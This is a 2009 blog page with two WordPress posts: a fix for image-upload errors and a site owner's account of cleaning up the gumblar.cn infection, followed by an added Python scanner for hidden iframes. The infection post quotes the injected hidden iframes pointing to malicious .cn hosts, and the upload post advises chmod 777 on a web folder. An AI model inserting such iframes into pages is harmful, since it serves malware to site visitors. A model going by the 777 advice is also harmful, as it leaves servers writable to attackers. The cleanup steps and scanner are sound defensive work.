Posts Tagged ‘Wordpress’

How to solve the image upload problem in a WordPress blog

May 17th, 2009

If you have a hosted WordPress blog, you might see the following error message while uploading images.

The uploaded file could not be moved to /var/www/vhosts/example.com/httpdocs/wp-content/uploads

I was trying to resolve this issue without causing any big damage to my hosted blog environment. There was a strange thing: if I set chmod to 777 and, in Settings -> Miscellaneous Settings, had wp-content as the value of the "Store uploads in this folder" text box, the scheme worked, but it cluttered my wp-content directory with a big pile of images. Still, I was not satisfied that I wasn't using the uploads folder. I changed the permission mode of the uploads folder to 777 and put wp-content/uploads in Miscellaneous Settings, but it was all in vain.

My issue was resolved by just making another folder in wp-content. I named it upload and put wp-content/upload in Miscellaneous Settings with chmod 777, where wp-content is 755.

Everything goes smoothly. I am able to upload images to a separate directory. Leave the uploads folder if it is creating a headache for you.

How to protect your website from gumblar.cn infection

May 6th, 2009

Yesterday one of my websites was infected by suspicious malware, gumblar.cn. This website contains several exploits and trojans that can harm your system. It starts its infection by invoking Adobe Acrobat Reader on your machine. After browsing my infected site, I found that the Acrobat Reader process was running in Task Manager.

According to the Google Safe Browsing service:

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

I found that some of my PHP files had been altered by adding an iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and, in the same directory, index-extra.php. I didn't find any other file that was infected by this.

I manually removed this embedded iframe <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe> and everything works fine.

If you have any information about this infection, people who are searching around the internet for a solution to this problem will highly appreciate it.

Update (5/11/09): I was able to remove this malware from my blog and WordPress admin site.

Removal

  • Removed the image.php file from all images folders. The image.php infection was only found in the ‘image’ folder. Make sure you don’t remove the original image.php file. If your original file is infected, remove only the malicious code
  • Looked for iframe code added at the top or bottom of PHP pages and removed it. I found this iframe, which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
  • Checked all PHP, HTML and JS files for added anonymous JavaScript methods. I found all the JS files in the wp-includes directory infected
  • Set the httpdocs directory permission to 755
  • Scanned my computer with Malwarebytes’ Anti-Malware, which identified and removed several threats
  • Updated my AVG Anti Virus
  • Changed my FTP password
  • I did all of this manual code removal from my Plesk control panel
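
The iframe check from the removal steps above can be run over a local copy of the site instead of opening each file by hand. This is an added Python example, not code from the original post; the names, the 4-pixel threshold, the `display: none` pattern and the `injected.invalid` host are assumptions chosen to match the shape of the iframes quoted above.

```python
import os
import re
import sys

# Heuristics are assumptions based on the injected tag quoted in the post:
# a 2x4 iframe styled "visibility: hidden". \u201d also accepts curly quotes.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC = re.compile(r"""src\s*=\s*["'\u201d]?([^"'\u201d\s>]+)""", re.IGNORECASE)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
DIMENSION = re.compile(r"""\b(?:width|height)\s*=\s*["'\u201d]?(\d+)""", re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm", ".js")
MAX_TINY_PX = 4  # assumed threshold; the quoted iframe was width=2 height=4
# Constructed sample: a theme file with a hidden iframe appended (placeholder host).
SAMPLE = ('<?php get_footer(); ?>\n<iframe src="http://injected.invalid/in.cgi?x" '
          'width=2 height=4 style="visibility: hidden"></iframe>')


def suspicious_iframes(text):
    """Return the src of every iframe that is hidden or only a few pixels in size."""
    hits = []
    for tag in IFRAME_TAG.findall(text):
        tiny = any(int(px) <= MAX_TINY_PX for px in DIMENSION.findall(tag))
        if tiny or HIDDEN.search(tag):
            src = SRC.search(tag)
            hits.append(src.group(1) if src else "")
    return hits


def scan_tree(root):
    """Map each PHP/HTML/JS file under root that has such an iframe to its src list."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = suspicious_iframes(handle.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:  # scan a local copy of the site
        for path, sources in sorted(scan_tree(sys.argv[1]).items()):
            print(f"{path}: {', '.join(sources)}")
    else:
        print(suspicious_iframes(SAMPLE))
```

A legitimate full-size embed (for example a video player) is not reported; only hidden or tiny iframes are, and each hit still needs a manual look before the file is edited.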

Please feel free to comment with your suggestions for more security measures to prevent such threats.